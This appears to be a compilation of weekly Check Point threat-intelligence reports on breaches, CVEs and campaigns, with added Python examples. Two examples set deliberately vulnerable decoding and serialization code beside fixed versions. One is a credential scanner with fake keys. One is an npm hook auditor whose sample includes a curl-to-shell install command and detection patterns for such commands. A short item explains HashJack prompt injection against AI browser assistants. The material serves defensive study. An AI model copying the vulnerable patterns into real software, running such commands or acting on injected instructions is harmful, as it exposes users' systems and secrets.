
29th December – Threat Intelligence Report

By: lorenf
29 December 2025 at 12:33

For the latest discoveries in cyber research for the week of 29th December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Romanian Waters, the country’s national water management authority, was hit by a ransomware attack that resulted in nearly 1,000 computer systems across national and regional offices being encrypted. The attack affected geographic information systems, databases, email, web servers, and Windows workstations. Operational technology controlling water infrastructure was not impacted, and no data leakage has been reported, but key IT services were disrupted across the organization.
  • France’s postal service La Poste has suffered a cyber-attack that disrupted key digital systems, impacting online parcel tracking, mail distribution, and banking services for customers of both the postal service and La Banque Postale. Some services were temporarily unavailable, with no evidence of data compromise. The attack was claimed by the pro-Russian hacktivist group NoName057(16).
  • Insurance giant Aflac has confirmed that a data breach it experienced in June resulted in the theft of sensitive files containing insurance claims, health data and Social Security numbers. The breach affected personal details of approximately 22.7 million individuals in its US business and has been attributed to the Scattered Spider threat group.

Check Point Harmony Endpoint provides protection against this threat.

  • Japan’s leading carmaker Nissan Motor Corporation has acknowledged a data breach that exposed personal information of approximately 21,000 customers of Nissan Fukuoka Sales Corporation, including names, addresses, phone numbers, email addresses, and sales operation data. The leak stemmed from unauthorized access to Red Hat data servers; financial data was not affected. The Crimson Collective threat actor claimed responsibility for the initial breach, and ShinyHunters later hosted samples of the stolen data.
  • Trust Wallet, a popular non-custodial cryptocurrency wallet, has disclosed a cyber-attack involving a compromised Chrome extension update. The malicious build exfiltrated sensitive wallet data, including seed phrases, to an attacker-controlled domain, allowing attackers to drain wallets and causing at least $7 million in losses. The incident primarily affected users of Chrome extension version 2.68.0.
  • Ubisoft’s live service game Rainbow Six Siege (R6) has confirmed a cyber-attack in which threat actors abused internal systems to manipulate bans, unlock all cosmetics and developer-only skins, and distribute around $13.33 million worth of in-game currency worldwide.
  • Baker University has disclosed a data breach in which attackers accessed its network and stole sensitive information belonging to 53,624 students, alumni, staff, and affiliates of the university, including names, Social Security numbers, financial account details, and medical records.

VULNERABILITIES AND PATCHES

  • A high-severity memory-read vulnerability, CVE-2025-14847, dubbed “MongoBleed”, has been identified in multiple MongoDB Server versions. An unauthenticated remote attacker can trigger a flaw in the server’s zlib handling to read uninitialized heap memory. The root cause is improper handling of a length parameter inconsistency (CWE-130), and the issue may also permit arbitrary code execution and system compromise. Affected versions include MongoDB 4.0 through 8.2.3.
  • Details of a critical serialization injection vulnerability in LangChain Core were disclosed. CVE-2025-68664 (CVSS 9.3) affects langchain-core: user-controlled dictionaries that carry an “lc” key are not escaped when serialized, so on deserialization they are treated as trusted objects, enabling secret extraction, prompt injection, and potentially arbitrary code execution.
  • A critical buffer overflow vulnerability, CVE-2025-68615, in Net-SNMP’s snmptrapd daemon can be triggered remotely via a specially crafted packet. The issue has a CVSS score of 9.8 and may allow unauthenticated attackers to achieve remote code execution or cause service crashes. Patches are available, and the vulnerability is addressed in Net-SNMP versions 5.9.5 and 5.10.pre2.
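
The root-cause pattern behind the MongoBleed item above, as an added example written for this page: it is not MongoDB’s code, and the four-byte header followed by a zlib stream is a constructed format, not the MongoDB wire protocol. A decoder that trusts the length the client declared, instead of the length the inflate actually produced, hands back bytes it never wrote; a reused buffer stands in for uninitialized heap memory. decode_fixed bounds the inflate by the declared length and rejects any mismatch.

```python
import struct
import zlib
from typing import Optional

# Constructed message format for illustration only: a 4-byte little-endian
# "declared uncompressed length" followed by a zlib stream. This is NOT
# MongoDB's OP_COMPRESSED layout; it is the minimum needed to show CWE-130.
HEADER = struct.Struct("<I")


def encode(payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Build a message. declared_len normally equals len(payload); an attacker
    can set it to anything, which is the inconsistency the server must catch."""
    if declared_len is None:
        declared_len = len(payload)
    return HEADER.pack(declared_len) + zlib.compress(payload)


class BufferPool:
    """Stand-in for heap reuse: hands back the same buffer every time without
    zeroing it, so it still holds whatever the previous request left behind."""

    def __init__(self, size: int) -> None:
        self._buf = bytearray(size)

    def get(self, n: int) -> bytearray:
        if n > len(self._buf):
            raise ValueError("request larger than pool buffer")
        return self._buf


def decode_vulnerable(msg: bytes, pool: BufferPool) -> bytes:
    """CWE-130 pattern: the declared length, not the real inflate output, decides
    how many bytes are handed back. Bytes the inflate never wrote are returned
    too, and they belong to whoever used the buffer last."""
    (declared_len,) = HEADER.unpack_from(msg)
    buf = pool.get(declared_len)
    out = zlib.decompress(msg[HEADER.size:])
    buf[: len(out)] = out
    return bytes(buf[:declared_len])


def decode_fixed(msg: bytes, pool: BufferPool) -> bytes:
    """Inflate at most declared_len + 1 bytes (the extra byte detects an
    over-long stream without relying on exact-fit end-of-stream handling) and
    require the output to be exactly declared_len bytes of a finished stream.
    Only bytes actually written are returned."""
    (declared_len,) = HEADER.unpack_from(msg)
    buf = pool.get(declared_len)
    inflater = zlib.decompressobj()
    out = inflater.decompress(msg[HEADER.size:], declared_len + 1)
    if len(out) != declared_len or not inflater.eof:
        raise ValueError("declared length does not match inflated data")
    buf[: len(out)] = out
    return bytes(buf[: len(out)])


if __name__ == "__main__":
    pool = BufferPool(64)
    # A legitimate request from an earlier client leaves its plaintext in the buffer.
    decode_vulnerable(encode(b"user=admin;pw=hunter2"), pool)
    # The attacker sends one byte but declares 22: the stale bytes come back.
    print(decode_vulnerable(encode(b"x", declared_len=22), pool))
    try:
        decode_fixed(encode(b"x", declared_len=22), pool)
    except ValueError as exc:
        print("rejected:", exc)
```

The same check matters in the other direction: a stream that inflates to more than the declared length is rejected before it is copied, which in a C implementation is the difference between an information leak and a heap overflow.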

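The serialization-injection class behind the langchain-core item, as an added toy written for this page: it is not langchain-core’s loader, and ChatPrompt, the “escaped” node type and the constructor allow-list are assumptions of the example. A loader that interprets every dict carrying an “lc” key is only safe if the serializer escapes user-controlled dicts before they reach the document; the allow-list is what keeps a crafted constructor node from becoming code execution.

```python
from typing import Any

# Toy serializer/loader shaped like the scheme described above: on load, any
# dict carrying an "lc" key is interpreted as an object reference. Written for
# this page as an illustration; it is not langchain-core's own code.


class ChatPrompt:
    """Hypothetical serializable object with one user-controlled field (metadata)."""

    def __init__(self, template: str, metadata: dict) -> None:
        self.template = template
        self.metadata = metadata

    def to_json(self) -> dict:
        return {
            "lc": 1,
            "type": "constructor",
            "id": ["ChatPrompt"],
            "kwargs": {"template": self.template, "metadata": self.metadata},
        }


# Allow-list of constructors the loader may instantiate (assumption for this toy).
ALLOWED_CONSTRUCTORS = {"ChatPrompt": ChatPrompt}


def loads(node: Any, secrets: dict) -> Any:
    """Recursive loader. The problem is not this function's shape but what the
    serializer feeds it: a user dict with an "lc" key lands here unmarked."""
    if isinstance(node, dict):
        if "lc" in node:
            kind = node.get("type")
            if kind == "escaped":
                return node["value"]  # literal data, never interpreted
            if kind == "secret":
                return secrets[node["id"][0]]  # resolves a named secret
            if kind == "constructor":
                name = node["id"][-1]
                cls = ALLOWED_CONSTRUCTORS.get(name)
                if cls is None:
                    raise ValueError(f"constructor not allowed: {name}")
                kwargs = {k: loads(v, secrets) for k, v in node["kwargs"].items()}
                return cls(**kwargs)
            raise ValueError(f"unknown lc node type: {kind}")
        return {k: loads(v, secrets) for k, v in node.items()}
    if isinstance(node, list):
        return [loads(v, secrets) for v in node]
    return node


def dumps_unescaped(obj: ChatPrompt) -> dict:
    """Vulnerable: user-controlled dicts go into the document verbatim, so one
    that happens to carry an "lc" key is later loaded as a trusted object."""
    return obj.to_json()


def _escape(value: Any) -> Any:
    """Mark every plain dict that carries an "lc" key so the loader treats it as
    data. Recurses so nested dicts and lists are covered too. A real serializer
    must apply this only to raw data, not to nested objects it serialized itself."""
    if isinstance(value, dict):
        if "lc" in value:
            return {"lc": 1, "type": "escaped", "value": value}
        return {k: _escape(v) for k, v in value.items()}
    if isinstance(value, list):
        return [_escape(v) for v in value]
    return value


def dumps_escaped(obj: ChatPrompt) -> dict:
    """Hardened: constructor kwargs are user data and get escaped before emission."""
    doc = obj.to_json()
    doc["kwargs"] = {k: _escape(v) for k, v in doc["kwargs"].items()}
    return doc


if __name__ == "__main__":
    secrets = {"OPENAI_API_KEY": "sk-constructed-example"}  # constructed, not real
    # Attacker-supplied metadata that mimics a serialized secret reference.
    hostile = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
    prompt = ChatPrompt("Hello {name}", metadata={"source": hostile})

    leaked = loads(dumps_unescaped(prompt), secrets)
    print("unescaped round-trip:", leaked.metadata["source"])  # the secret value

    safe = loads(dumps_escaped(prompt), secrets)
    print("escaped round-trip:  ", safe.metadata["source"])  # the literal dict
```

The unescaped round-trip is the secret-extraction case: a value the user typed into a metadata field comes back as the resolved API key, which then flows wherever the prompt’s metadata is displayed or logged. Escaping is idempotent from the attacker’s side, since a hand-written “escaped” node only ever yields its own literal value.
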
THREAT INTELLIGENCE REPORTS

  • Check Point researchers describe a phishing campaign in which attackers abused Google Cloud Application Integration’s “Send Email” workflow to send over 9,000 spoofed Google notification emails from a Google address. The messages targeted the manufacturing, technology, and finance sectors and used multi-step redirection through Google domains to lead victims to a Microsoft-themed credential harvesting site. Most victims were located in the US, Asia-Pacific, and Europe.
  • Researchers uncovered a two-year Evasive Panda campaign using adversary-in-the-middle DNS poisoning to deliver MgBot via fake updaters and stealthy loaders. The chain used multi-stage shellcode, hybrid encryption, and DLL sideloading to run MgBot in memory, with victim-specific payloads tied to machines via DPAPI and RC5. Attackers poisoned legitimate domains, injected into signed system processes for persistence, and updated configs with hardcoded C2s.

Check Point Harmony Endpoint provides protection against this threat (Infostealer.Win.MgBot)

  • A Webrat campaign leveraged fake GitHub repositories masquerading as exploit and proof-of-concept code for high-severity CVEs, targeting gamers, students, and inexperienced security researchers. The attack uses droppers to elevate privileges, disable Windows Defender, and deploy the Webrat backdoor, enabling remote control, credential theft, keylogging, and device surveillance.
  • Researchers found lotusbail, a malicious npm package masquerading as a WhatsApp Web API library that intercepts messages and steals session/auth data, contacts, and media via WebSocket tampering and device-pairing hijack. Separately, 14 malicious NuGet packages were found redirecting crypto funds and stealing Google Ads OAuth tokens.

The post 29th December – Threat Intelligence Report appeared first on Check Point Research.

22nd December – Threat Intelligence Report

By: lorenf
22 December 2025 at 13:39

For the latest discoveries in cyber research for the week of 22nd December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Adult content platform Pornhub has disclosed a data breach linked to analytics provider Mixpanel. The breach exposed more than 200 million records related to Premium users, including email addresses, search, watch, and download histories, locations, and associated video details collected prior to 2021. Pornhub stated that no passwords, payment information, or government-issued IDs were compromised. OpenAI also acknowledged a related incident caused by the compromise of Mixpanel. The breach has been attributed to the ShinyHunters extortion group.
  • SoundCloud, an online audio streaming platform, has confirmed a cyber attack in which threat actors gained unauthorized access to a database containing users’ email addresses and public profile information. The breach affected approximately 20% of SoundCloud’s users, potentially as many as 28 million accounts, and caused outages and VPN connection issues. The ShinyHunters extortion gang has claimed responsibility for this attack.
  • Autoparts giant LKQ has acknowledged a cyberattack tied to the Oracle E-Business Suite compromise. The company said personal data of over 9,070 people, including Employer Identification Numbers and Social Security numbers, was exposed.

Check Point IPS provides protection against this threat (Oracle Multiple Products Remote Code Execution)

  • DXS International, a British NHS technology supplier, suffered a cyber-attack on December 14th in which attackers gained unauthorized access to its internal office servers. Internal systems were affected, but clinical services were not disrupted, and it remains unclear whether NHS patient data was compromised.
  • The University of Sydney has suffered a data breach that resulted in hackers gaining access to an online coding repository and stealing files containing personal information of staff and students. Over 27,000 individuals were affected, including names, dates of birth, phone numbers, home addresses, and job details for current and former staff, students, alumni, and affiliates.
  • Petróleos de Venezuela (PDVSA), Venezuela’s state oil company, has experienced a cyberattack that resulted in disruptions to its export operations and offline systems managing the country’s main crude terminal. The incident affected administrative and operational network systems, leading to a halt in cargo deliveries. The scope of data or user information compromised has not been disclosed.
  • Denmark’s water utility has experienced a cyber attack that resulted in a disruption of critical water infrastructure systems. The attack impacted operational control systems supporting essential services, forming part of a broader campaign of attacks targeting Denmark’s critical infrastructure and electoral environment. The Danish Defence Intelligence Service attributed the incident to the Russia affiliated group Z-Pentest.

VULNERABILITIES AND PATCHES

  • A critical vulnerability with a CVSS score of 10.0 was disclosed in HPE OneView software. The flaw, CVE-2025-37164, allows unauthenticated remote code execution and affects all versions prior to 11.00, including versions 5.20 through 10.20. Successful exploitation could let a remote attacker execute arbitrary code on the affected centralized IT infrastructure management systems.

Check Point IPS provides protection against this threat (HPE OneView Remote Code Execution (CVE-2025-37164))

  • A critical remote code execution vulnerability, CVE-2025-14733, in WatchGuard Firebox firewalls running Fireware OS 11.x and later is being actively exploited. The out-of-bounds write flaw enables unauthenticated remote code execution, without user interaction, on unpatched devices with IKEv2 configured.
  • Researchers spotted active exploitation of CVE-2025-59718 and CVE-2025-59719, critical authentication bypass flaws in Fortinet FortiGate, FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager. Attackers can log in without credentials and export full device configurations, exposing the stored credentials to offline cracking.

THREAT INTELLIGENCE REPORTS

  • Check Point Research revealed a sophisticated wave of attacks attributed to the Chinese threat actor Ink Dragon, which targets European governments while continuing campaigns in Southeast Asia and South America. The threat actor converts compromised IIS servers into relay nodes with ShadowPad, exploits predictable configuration keys for access, and deploys a new FinalDraft backdoor for exfiltration and lateral movement.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Check Point Research analyzed GachiLoader, a Node.js–based malware loader observed in a campaign linked to the YouTube Ghost Network. The campaign is notable for extensive obfuscation and a previously undocumented PE injection technique. GachiLoader deploys a second-stage loader, Kidkadi, which abuses Vectored Exception Handling (VEH) in a novel method, dubbed Vectored Overloading, to load its malicious payload.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Check Point Research noticed a surge in darknet campaigns recruiting insiders at banks, crypto exchanges, telecoms, and major tech firms to sell access and data. Listings advertise payouts of $3,000 to $15,000, offer datasets like 37 million records for $25,000, and solicit telecom staff for SIM swapping to bypass two-factor authentication.
  • Check Point researchers reported on a global surge in AI-driven holiday scams across phishing, fake retail sites, and social media giveaways. They recorded 33,502 phishing emails in two weeks and over 10,000 daily ads impersonating delivery brands such as Royal Mail, FedEx, UPS and DPD, while AI chatbots help fraudulent stores appear credible.

The post 22nd December – Threat Intelligence Report appeared first on Check Point Research.

8th December – Threat Intelligence Report

By: lorenf
8 December 2025 at 14:07

For the latest discoveries in cyber research for the week of 8th December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The University of Pennsylvania and the University of Phoenix were hit by data breaches after attackers exploited zero-day vulnerabilities in Oracle E-Business Suite servers. At least 1,488 people at UPenn and numerous students, alumni, donors, staff, faculty, employees, and suppliers at Phoenix were impacted. The Cl0p ransomware gang is likely responsible, as part of a broader campaign.

Check Point IPS, Threat Emulation and Harmony Endpoint provide protection against this threat (Oracle Multiple Products Remote Code Execution; Ransomware.Win.Clop; Ransomware.Wins.Clop; Ransomware.Wins.Clop.ta.*)

  • Financial software provider Marquis Software Solutions has disclosed a data breach that impacted over 74 banks and credit unions across the US and exposed sensitive data of more than 400,000 customers. The Akira ransomware gang is possibly responsible for the attack, which exploited vulnerabilities in SonicWall firewalls to gain network access.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Akira.ta.*; Ransomware.Wins.Akira)

  • American pharmaceutical firm Inotiv has reported on a ransomware attack that occurred in August 2025. The Qilin ransomware group claimed responsibility, leaking personal information from over 9,500 individuals, including current and former employees and their family members.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • South Korean retail giant Coupang has confirmed a data breach that exposed personal information belonging to nearly 34 million customers, including full names, phone numbers, email addresses, and more. No payment details or account passwords were leaked in the incident.
  • SmartTube, a third-party YouTube app for Android TV, was targeted in an attack that compromised its developer signing keys and distributed a malicious update containing hidden malware. The incident affected users of Android TV, Fire TV Stick, and similar devices.
  • Belgian postal and package delivery service, Bpost, has suffered a data breach that resulted in the exfiltration of 5,140 files totaling about 30.46GB from a third-party exchange platform. The stolen data reportedly includes personal and business information of some customers of the affected department. The ransomware group TridentLocker has claimed responsibility for the attack.
  • Canadian wireless telecommunications provider, Freedom Mobile, has experienced a data breach that resulted in attackers gaining unauthorized access to its customer account management platform and stealing personal information, including names, addresses, dates of birth, phone numbers, and account numbers. The company has not disclosed the exact number of affected customers.

VULNERABILITIES AND PATCHES

  • Check Point has elaborated on the critical React2Shell vulnerability, CVE-2025-55182, that affects React 19.x and related server-side frameworks such as Next.js 15.x/16.x. The vulnerability enables unauthenticated remote code execution via malicious HTTP requests targeting the server’s decoding process. Exploitation allows attackers to gain full control over application servers, intercept sensitive data, inject false transactions, and potentially pivot deeper into enterprise environments.

Check Point IPS provides protection against this threat (React Server Components Remote Code Execution (CVE-2025-55182))

  • Check Point Research revealed a vulnerability in OpenAI Codex CLI that allowed attackers to achieve remote code execution via malicious project-local configuration files (MCP entries) executed without user prompts. OpenAI released a patch in version 0.23.0 to address the automatic execution risk.
  • Check Point Research shared details of a critical exploit in Yearn Finance’s yETH pool, where an attacker abused a smart contract flaw to mint trillions of tokens with a minuscule deposit, resulting in the theft of approximately $9 million in assets from the Ethereum-based DeFi protocol.

THREAT INTELLIGENCE REPORTS

  • Check Point summarizes a multiyear Salt Typhoon cyber-espionage campaign that compromised 80 telecom providers worldwide and a US state Army National Guard network, chaining SIM-based credential theft, network scans, Ivanti/PAN-OS/Cisco CVEs and GTP/GTPDOOR abuses to exfiltrate sensitive communications and configuration data.
  • US and Canadian cybersecurity agencies outlined BRICKSTORM, a stealthy backdoor used by Chinese affiliated hackers to infiltrate VMware vSphere environments and maintain long-term access. The campaign targeted government services and IT, stealing credentials via VM snapshots and creating hidden machines.
  • The ShadyPanda threat actor ran a seven-year campaign weaponizing verified Chrome and Edge extensions to infect over 4.3 million devices with spyware for remote code execution, payload delivery, traffic redirection, credential and cookie theft, browser fingerprinting, HTTPS credential interception, and behavioral biometrics exfiltration.
  • Researchers identified a campaign weaponizing Velociraptor, a digital forensics tool, to establish stealthy command channels and maintain persistence in enterprise environments. Attackers exploited SharePoint’s “ToolShell” chain using CVE-2025-49706 and CVE-2025-49704, linked to Storm-2603, and in confirmed cases delivered Warlock ransomware.
  • Albiriox, a new Android banking trojan sold as Malware-as-a-Service (MaaS), targets over 400 financial and crypto apps using VNC-style remote control, accessibility abuse, overlays, and black-screen masking for on-device fraud. The malware is spread via smishing, WhatsApp lures, and fake apps with droppers over unencrypted TCP C2 channels using structured JSON messages.

The post 8th December – Threat Intelligence Report appeared first on Check Point Research.

1st December – Threat Intelligence Report

By: lorenf
1 December 2025 at 10:03

For the latest discoveries in cyber research for the week of 1st December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • OpenAI has experienced a data breach resulting from a compromise at third-party analytics provider Mixpanel, which exposed limited information of some ChatGPT API clients. The leaked data includes names, email addresses, approximate location, operating system, browser information, referring websites, and organization or user IDs. No sensitive credentials or API keys were exposed.
  • Dartmouth College, a private Ivy League research university in New Hampshire, has been a victim of a data breach that resulted in the theft of personal information, including names, Social Security numbers and financial details, from its Oracle E-Business Suite servers. The Cl0p extortion gang exploited a zero-day vulnerability as part of a broader campaign; other targets include Harvard University and Envoy Air, with sensitive data exposed via dark web and torrent sites.

Check Point IPS, Threat Emulation and Harmony Endpoint provide protection against this threat (Oracle Concurrent Processing Remote Code Execution; Ransomware.Win.Clop; Ransomware.Wins.Clop; Ransomware.Wins.Clop.ta.*)

  • Crisis24, a leader in crisis and risk management, was hit by a cyberattack on its OnSolve CodeRED emergency alert platform that resulted in widespread disruption of notification systems nationwide and the theft of user data. Leaked information includes names, addresses, email addresses, phone numbers, and clear-text passwords, affecting state and local governments, public safety agencies, and residents across the US. The INC Ransomware gang has claimed responsibility for the attack and is offering the stolen data for sale.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.INC)

  • Major American investment advisory provider SitusAMC has confirmed a data breach that compromised corporate data associated with client relationships, including accounting records, legal agreements, and potentially customer data. The breach impacted an undisclosed number of clients and customers, likely including the largest banks and financial institutions in the US, and no information has yet been provided on the amount or exact type of data leaked.
  • Donbas Post, a Russian postal operator, has encountered a cyber-attack that disrupted its corporate network, web platform, and email systems, destroying over 1,000 workstations, 100 virtual machines, and several dozen terabytes of data, and forcing the suspension of services at postal branches and the call center. The Ukrainian Cyber Alliance has claimed responsibility.
  • The French Football Federation (FFF) has suffered a data breach that resulted in unauthorized access to administrative management software and theft of personal and contact information from members of French football clubs. Exposed data includes names, email addresses, and more.

VULNERABILITIES AND PATCHES

  • A new Mirai-based botnet, ShadowV2, was observed exploiting multiple known vulnerabilities (including CVE-2024-10914, CVE-2024-10915, and CVE-2024-53375) in IoT devices to gain control and launch distributed denial-of-service (DDoS) attacks. The botnet leveraged command injection and other flaws in routers, NAS devices, and DVRs across global sectors.

Check Point IPS provides protection against this threat (D-Link DNS NAS Devices Command Injection (CVE-2024-10914); D-Link DNS Series Command Injection; TP-Link Archer AXE75 Command Injection (CVE-2024-53375))

  • A security researcher uncovered more than 17,000 exposed credentials during a scan of 5.6 million public GitLab repositories, including API keys, passwords, and access tokens associated with over 2,800 domains. Many of these credentials, primarily Google Cloud, MongoDB, Telegram, and OpenAI keys, remain active. While most were leaked after 2018, some still-valid keys date back to 2009.
  • A patch was released for a critical authentication bypass vulnerability (CVE-2025-59366) in ASUS routers with AiCloud enabled, which allows remote attackers to exploit chained path traversal and OS command injection flaws for unauthorized function execution. Successful exploitation does not require user interaction and could result in attackers gaining control over vulnerable devices.
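
A scanner for the credential families named in the GitLab item above, as an added example written for this page and not taken from the research it summarizes. The regexes encode the publicly known prefixes and lengths for Google API keys, MongoDB connection strings, Telegram bot tokens and OpenAI keys (an assumption that those formats have not changed), the placeholder filter is a heuristic, and every credential in the constructed sample repository is fake.

```python
import re

# Shape rules for the credential families named above. These are the publicly
# documented prefixes/lengths; treat them as heuristics and expect vendors to
# change formats (assumption: formats as of this writing).
PATTERNS = {
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "mongodb_uri": re.compile(r"\bmongodb(?:\+srv)?://[^:\s/@]+:[^@\s/]+@[^\s'\"]+"),
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_\-]{35}\b"),
    "openai_api_key": re.compile(r"\bsk-(?:proj-)?[A-Za-z0-9_\-]{20,}\b"),
}

# Placeholder shapes that show up in docs and templates; skip them to cut noise.
PLACEHOLDER = re.compile(r"(.)\1{4,}|xxxx|changeme|placeholder|your[_-]?key", re.IGNORECASE)


def redact(secret: str) -> str:
    """Keep enough to locate the credential in the file, never enough to use it."""
    if len(secret) <= 8:
        return "*" * len(secret)
    return secret[:4] + "*" * (len(secret) - 6) + secret[-2:]


def scan_text(path: str, text: str) -> list:
    """Return one finding per credential-shaped match, with the value redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                if PLACEHOLDER.search(m.group(0)):
                    continue
                findings.append(
                    {"path": path, "line": lineno, "kind": kind, "value": redact(m.group(0))}
                )
    return findings


def scan_files(files: dict) -> list:
    """files maps a repo-relative path to its text content."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample repository contents; every credential below is fake.
SAMPLE_REPO = {
    "config/settings.py": 'GOOGLE_KEY = "AIzaSyA1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q"\n',
    ".env": "MONGO_URL=mongodb+srv://app:s3cr3tpass@cluster0.example.net/prod\n",
    "bot/run.py": 'TOKEN = "123456789:AAE1234567890abcdefghijklmnopqrstuv"\n',
    "notebooks/demo.py": 'openai.api_key = "sk-proj-abcdefghijklmnopqrstuvwxyz0123456789"\n',
    "README.md": "Set GOOGLE_KEY to your own key, e.g. AIza" + "X" * 35 + "\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_REPO):
        print(f"{f['path']}:{f['line']} {f['kind']} {f['value']}")
```

A match is a reason to rotate, not proof of validity: the report’s point is that many of these keys were still live years later, so the follow-up is revocation at the issuing service and a history rewrite, not just deleting the line.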

THREAT INTELLIGENCE REPORTS

  • Check Point researchers analyzed the Shai-Hulud 2.0 npm supply chain campaign that compromised over 600 npm packages and 25,000 GitHub repositories. Malicious preinstall scripts stole developer and multi-cloud credentials, exfiltrated them to attacker GitHub repos, registered infected hosts as self-hosted runners, and used the stolen tokens for worm-like propagation across npm and GitHub.

Check Point Threat Emulation provides protection against this threat (Trojan.Wins.ShaiHulud.ta.*)

  • Check Point researchers uncovered GhostAd, a large-scale Android adware campaign where at least 15 Google Play applications with millions of installs abuse foreground services, blank notifications, JobScheduler, and ad SDKs to run persistent background ads and drain device resources. These applications also use background execution and storage permissions to persist, hide, and silently exfiltrate external-storage files, including corporate documents, to attacker infrastructure.
  • Check Point outlines the cyber risks it expects for 2026, including the convergence of agentic AI, quantum computing, and Web 4.0. The blog lists 12 trends, among them autonomous AI operations, digital-twin/XR environments, LLM-native attacks, deepfake fraud, quantum “harvest-now, decrypt-later” exposure, data-pressure ransomware, and expanding supply-chain, SaaS, and identity threats.
  • Researchers detailed HashJack, an indirect prompt injection technique that embeds malicious instructions in elements like URL fragments or emails to manipulate AI browser assistants – including Comet, Copilot for Edge, and Gemini for Chrome. This method enables threat actors to trigger phishing, misinformation, data exfiltration, and credential theft, exploiting LLMs’ inability to distinguish instructions from legitimate data.
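
An audit for the install-time hook the Shai-Hulud 2.0 item above describes, as an added example written for this page; the heuristics and the package names and commands in the sample tree are constructed, not taken from the campaign. It walks parsed package.json manifests and flags every lifecycle script, escalating those that fetch, decode or execute something at install time.

```python
import re

# npm lifecycle hooks that run automatically on install; `prepare` also runs
# for git dependencies and on a bare `npm install` in the package itself.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command shapes that turn an install hook into a payload-delivery step.
# Heuristics written for this page, not an npm feature.
HIGH_RISK = (
    (re.compile(r"\b(?:curl|wget)\b"), "fetches from the network at install time"),
    (re.compile(r"\|\s*(?:sh|bash)\b"), "pipes into a shell"),
    (re.compile(r"\bnode\s+(?:-e|--eval)\b"), "evaluates inline JavaScript"),
    (re.compile(r"\b(?:base64|atob)\b"), "decodes an embedded payload"),
    (re.compile(r"\bnode\s+\S+\.js\b"), "runs a script shipped inside the package"),
)


def audit_package(name: str, manifest: dict) -> list:
    """Return one finding per lifecycle hook a package declares."""
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        reasons = [why for rx, why in HIGH_RISK if rx.search(command)]
        findings.append({
            "package": name,
            "version": manifest.get("version", "?"),
            "hook": hook,
            "command": command,
            "severity": "high" if reasons else "medium",
            "reasons": reasons,
        })
    return findings


def audit_tree(packages: dict) -> list:
    """packages maps package name to its parsed package.json (for example read
    from node_modules/<name>/package.json after an install with scripts ignored).
    High-severity findings sort first, then by package name."""
    findings = []
    for name, manifest in packages.items():
        findings.extend(audit_package(name, manifest))
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["package"]))


# Constructed sample tree; package names and commands are made up for this page.
SAMPLE_TREE = {
    "plain-lib": {"version": "1.2.0", "scripts": {"build": "tsc", "test": "jest"}},
    "native-addon": {"version": "3.0.1", "scripts": {"postinstall": "node-gyp rebuild"}},
    "color-utils": {"version": "4.1.7", "scripts": {"preinstall": "node setup_runtime.js"}},
    "telemetry-helper": {
        "version": "0.9.3",
        "scripts": {"postinstall": "curl -s https://updates.invalid/bootstrap.sh | sh"},
    },
}

if __name__ == "__main__":
    for f in audit_tree(SAMPLE_TREE):
        print(f"[{f['severity']}] {f['package']}@{f['version']} {f['hook']}: {f['command']}")
        for why in f["reasons"]:
            print("    -", why)
```

Run it over node_modules after `npm ci --ignore-scripts` so nothing executes before the audit; `npm config set ignore-scripts true` makes that the default for the machine, at the cost of running legitimate build hooks (native addons, for example) by hand. A medium finding is not malicious on its own, but a package that gained a preinstall script between two versions deserves a look at the diff before the script is allowed to run.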

The post 1st December – Threat Intelligence Report appeared first on Check Point Research.

24th November – Threat Intelligence Report

By: lorenf
24 November 2025 at 11:51

For the latest discoveries in cyber research for the week of 24th November, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The notorious “Scattered LAPSUS$ Hunters” group claimed responsibility for a supply-chain attack involving the Salesforce-integrated platform Gainsight. The group stated that data from 300 organizations was compromised, including Verizon, GitLab and Atlassian. Salesforce has confirmed unusual activity related to Gainsight integrations and has revoked all active access tokens as a precaution, emphasizing that there is no vulnerability in Salesforce’s core platform.
  • Eurofiber France SAS, the French unit of Dutch telecommunications provider Eurofiber Group N.V., has been a victim of a data breach. The attack resulted in unauthorized access to its French ticket management system and the exfiltration of customer information from its cloud division and regional sub-brands. A threat actor known as “ByteToBreach” claimed responsibility for the attack.
  • Italian IT provider Almaviva has confirmed a cyberattack, with stolen data including information from Ferrovie dello Stato Italiane, Italy’s national railway operator. Nearly 2.3 TB of sensitive files were leaked, including passenger passport data, employee records across FS subsidiaries, defense-related contracts, and financial documents. Almaviva says critical services remain operational.
  • South Korean battery giant LG Energy Solution has experienced a ransomware attack at a single overseas facility, which the company says has been restored, with headquarters unaffected. The Akira gang claimed to have stolen 1.7 terabytes of data.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Wins.Akira.ta.*; Ransomware.Wins.Akira; Trojan.Win.Akira)

  • Microsoft’s Azure cloud was hit by a massive 15.72 Tbps distributed denial-of-service (DDoS) attack (3.64 billion packets per second) against a public IP address in Australia, sourced from over 500,000 IPs. The high-rate UDP flood is attributed to the Aisuru Turbo Mirai-class IoT botnet, which abuses compromised home routers, cameras, and other internet-connected devices.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Trojan.Wins.Mirai)

